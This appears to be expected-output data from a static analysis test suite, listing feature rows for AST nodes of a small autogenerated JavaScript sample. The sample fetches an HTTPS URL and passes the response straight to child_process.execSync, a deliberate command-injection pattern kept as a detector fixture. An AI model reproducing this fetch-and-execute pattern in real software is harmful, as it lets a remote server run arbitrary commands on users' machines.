autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:5:1:28 | https | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:5:1:28 | https | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:5:1:28 | https = ... https") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:5:1:28 | https = ... https") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:5:1:28 | https = ... https") | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:19 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:19 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:19 | require | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:28 | exceptional return of require("https") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:28 | exceptional return of require("https") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:28 | exceptional return of require("https") | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:28 | require("https") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:28 | require("https") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:28 | require("https") | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:21:1:27 | "https" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:21:1:27 | "https" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:21:1:27 | "https" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:21:1:27 | "https" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:21:1:27 | "https" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:21:1:27 | "https" | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:5:2:6 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:5:2:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:5:2:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:5:2:6 | cp | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:5:2:33 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:5:2:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:5:2:33 | cp | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:5:2:33 | cp = re ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:5:2:33 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:5:2:33 | cp = re ... ocess") | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:16 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:16 | require | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:33 | exceptional return of require ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:33 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:33 | exceptional return of require ... ocess") | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:33 | require ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:33 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:33 | require ... ocess") | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:18:2:32 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:18:2:32 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:18:2:32 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:18:2:32 | "child_process" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:18:2:32 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:18:2:32 | "child_process" | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:4:5 | https | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:4:5 | https | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:4:5 | https | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:4:9 | https.get | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:4:9 | https.get | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:4:9 | https.get | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:8:1 | exceptional return of https.g ... })\\n) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:8:1 | exceptional return of https.g ... })\\n) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:8:1 | exceptional return of https.g ... })\\n) | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:8:1 | https.g ... })\\n) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:8:1 | https.g ... })\\n) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:8:1 | https.g ... })\\n) | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:7:4:9 | get | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:7:4:9 | get | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:7:4:9 | get | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:11:4:39 | "https: ... ommand" | CalleeFlexibleAccessPath | https.get | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:11:4:39 | "https: ... ommand" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:11:4:39 | "https: ... ommand" | calleeImports | https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:11:4:39 | "https: ... ommand" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:11:4:39 | "https: ... ommand" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:11:4:39 | "https: ... ommand" | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:11:4:39 | "https: ... ommand" | receiverName | https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:4:44 | res | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:4:44 | res | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:4:44 | res | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:4:44 | res | contextSurroundingFunctionParameters | (res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:4:44 | res | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:4:44 | res | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:4:44 | res | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:4:44 | res | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:4:44 | res | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:4:44 | res | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | 'arguments' object of anonymous function | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | 'arguments' object of anonymous function | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | 'arguments' object of anonymous function | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | exceptional return of anonymous function | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | exceptional return of anonymous function | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | exceptional return of anonymous function | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | res =>\\n ... \\n }) | CalleeFlexibleAccessPath | https.get | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | res =>\\n ... \\n }) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | res =>\\n ... \\n }) | calleeImports | https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | res =>\\n ... \\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | res =>\\n ... \\n }) | contextSurroundingFunctionParameters | (res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | res =>\\n ... \\n }) | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | res =>\\n ... \\n }) | receiverName | https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | return of anonymous function | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | return of anonymous function | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:42:7:6 | return of anonymous function | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:5:7 | res | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:5:7 | res | contextSurroundingFunctionParameters | (res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:5:7 | res | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:5:7 | res | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:5:7 | res | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:5:10 | res.on | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:5:10 | res.on | contextSurroundingFunctionParameters | (res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:5:10 | res.on | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:5:10 | res.on | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:5:10 | res.on | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | exceptional return of res.on( ... \\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | exceptional return of res.on( ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | exceptional return of res.on( ... \\n }) | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | exceptional return of res.on( ... \\n }) | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | exceptional return of res.on( ... \\n }) | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | res.on( ... \\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | res.on( ... \\n }) | contextSurroundingFunctionParameters | (res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | res.on( ... \\n }) | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | res.on( ... \\n }) | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | res.on( ... \\n }) | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:9:5:10 | on | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:9:5:10 | on | contextSurroundingFunctionParameters | (res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:9:5:10 | on | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:9:5:10 | on | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:9:5:10 | on | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:12:5:17 | "data" | CalleeFlexibleAccessPath | res.on | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:12:5:17 | "data" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:12:5:17 | "data" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:12:5:17 | "data" | contextSurroundingFunctionParameters | (res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:12:5:17 | "data" | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:12:5:17 | "data" | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:12:5:17 | "data" | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:12:5:17 | "data" | receiverName | res | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:19 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:19 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:19 | cp | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:19 | cp | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:19 | cp | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:26 | command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:26 | command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:26 | command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:26 | command | contextSurroundingFunctionParameters | (res)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:26 | command | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:26 | command | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:26 | command | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:26 | command | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:26 | command | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:5:26 | command | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | 'arguments' object of anonymous function | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | 'arguments' object of anonymous function | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | 'arguments' object of anonymous function | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | command ... ;\\n } | CalleeFlexibleAccessPath | res.on | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | command ... ;\\n } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | command ... ;\\n } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | command ... ;\\n } | contextSurroundingFunctionParameters | (res)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | command ... ;\\n } | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | command ... ;\\n } | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | command ... ;\\n } | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | command ... ;\\n } | receiverName | res | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | exceptional return of anonymous function | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | exceptional return of anonymous function | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | exceptional return of anonymous function | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | return of anonymous function | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | return of anonymous function | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:20:7:5 | return of anonymous function | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:10 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:10 | cp | contextSurroundingFunctionParameters | (res)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:10 | cp | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:10 | cp | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:10 | cp | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:19 | cp.execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:19 | cp.execSync | contextSurroundingFunctionParameters | (res)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:19 | cp.execSync | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:19 | cp.execSync | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:19 | cp.execSync | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | cp.execSync(command) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | cp.execSync(command) | contextSurroundingFunctionParameters | (res)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | cp.execSync(command) | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | cp.execSync(command) | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | cp.execSync(command) | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | exceptional return of cp.execSync(command) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | exceptional return of cp.execSync(command) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | exceptional return of cp.execSync(command) | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | exceptional return of cp.execSync(command) | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | exceptional return of cp.execSync(command) | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:12:6:19 | execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:12:6:19 | execSync | contextSurroundingFunctionParameters | (res)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:12:6:19 | execSync | enclosingFunctionBody | res res on data command cp execSync command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:12:6:19 | execSync | enclosingFunctionName | https.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:12:6:19 | execSync | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:21:6:27 | command | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:21:6:27 | command | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:21:6:27 | command | calleeImports | child_process | +| 